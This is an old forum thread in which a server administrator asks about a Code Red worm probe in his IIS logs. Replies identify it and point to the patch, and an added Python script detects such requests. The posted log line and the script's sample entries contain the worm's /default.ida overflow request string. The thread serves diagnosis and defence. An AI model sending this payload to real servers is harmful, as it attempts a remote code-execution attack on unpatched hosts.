Thread: Index Server Attack on IIS

  1. #1
    Savage Guest

    Index Server Attack on IIS


    Here is the log from an attack. What can be accomplished by this attack?
    /default.ida?%20nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a/

    The log produces a 200 response, which means file found. There is no default.ida
    on the server, I searched and nothing came up.
    An error is produced "FILE. error ..."

    Can the attacker gain access this way?
    Thanks for any help.
    Savage

  2. #2
    Savage Guest

    Re: Index Server Attack on IIS


    I went to Microsoft's web site. They have a page on securing a web server.
    I did the following:
    In IIS under the web site I clicked properties and under home directory I
    clicked configure. I removed the reference to .ida files.

    Then the attack came again. This time the hacker was given a response of
    404 "file not found". I got at least 15 attacks from 15 different IP addresses.
    This may be a trojan program running on unsuspecting machines. Is there any
    way to track down these machines? Or find out who is sending this data?
    Thanks
    Savage




  3. #3
    Don Bevis Guest

    Re: Index Server Attack on IIS

    This may be the "unchecked buffer" hole, being exploited by the Code Red
    worm:

    http://www.microsoft.com/technet/sec...n/MS01-033.asp






  4. #4
    Michael Howard Guest

    Re: Index Server Attack on IIS


    Looks like Code Red.





  5. #5
    conny Guest

    Re: Index Server Attack on IIS


    Looks like the famous Code Red worm (Version 1), which will also
    affect your server if...

    * you installed your web server (port 80) on a Windows 2000 IIS
    * you did not fix the security hole in Index Server (default.ida)


    (My logfiles look the same, except for the space after the question mark
    ...?%20nnn, and my 'n's are in uppercase.)

    Your logfiles may now also show requests like
    ...default.ida?XXXXX...
    This is the new version of Code Red (Version 2).
    The error messages of Version 1 and 2 are not similar.
    Version 1 will raise the 'malformed header' error and
    Version 2 the 'file not found' code.
    You can find out how to disinfect at the NAV (Norton AntiVirus) homepage.
    www.symantec.com/search

    regards
    Conny


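Added example, not part of any post in this thread: a log triage script that finds requests shaped like the one posted above (an .ida stem, a long run of one filler character, then %uXXXX words) and groups them by client IP, status code and filler character. It assumes IIS W3C extended logs with a #Fields header; the 100-character threshold, the field selection and the sample entries are constructed for illustration.

```python
import re
from collections import defaultdict

# Optional %20, then one letter repeated 100+ times, then %uXXXX-encoded words:
# the shape of the query string posted in this thread (threshold is an assumption).
SIGNATURE = re.compile(r"^(?:%20)?([A-Za-z])\1{99,}(?:%u[0-9a-fA-F]{4})+")

def parse_w3c(lines):
    """Yield one dict per log entry, named by the most recent #Fields directive."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))

def find_ida_probes(lines):
    """Group matching requests by client IP: count, status codes, filler chars."""
    hits = defaultdict(lambda: {"count": 0, "statuses": set(), "fillers": set()})
    for entry in parse_w3c(lines):
        if not entry.get("cs-uri-stem", "").lower().endswith(".ida"):
            continue
        match = SIGNATURE.match(entry.get("cs-uri-query", ""))
        if match:
            rec = hits[entry.get("c-ip", "?")]
            rec["count"] += 1
            rec["statuses"].add(entry.get("sc-status", "?"))
            rec["fillers"].add(match.group(1))  # 'n'/'N' vs 'X', as in post #5
    return dict(hits)

# Constructed sample log: documentation IP ranges, encoded tail shortened.
TAIL = "%u9090%u6858%ucbd3%u7801=a"
SAMPLE = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2001-07-19 14:02:11 192.0.2.10 GET /default.ida %20" + "n" * 224 + TAIL + " 200",
    "2001-07-20 09:15:40 192.0.2.10 GET /default.ida %20" + "n" * 224 + TAIL + " 404",
    "2001-08-05 03:31:02 198.51.100.7 GET /default.ida " + "X" * 224 + TAIL + " 404",
    "2001-08-05 03:40:19 203.0.113.5 GET /default.htm - 200",
    "2001-08-05 03:41:55 203.0.113.5 GET /search.ida q=test 404",
]

if __name__ == "__main__":
    for ip, rec in sorted(find_ida_probes(SAMPLE).items()):
        print(ip, rec["count"], sorted(rec["statuses"]), sorted(rec["fillers"]))
```

The status set per address shows whether a request arrived before or after the .ida mapping was removed, matching the 200 and 404 responses described in posts #1 and #2.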


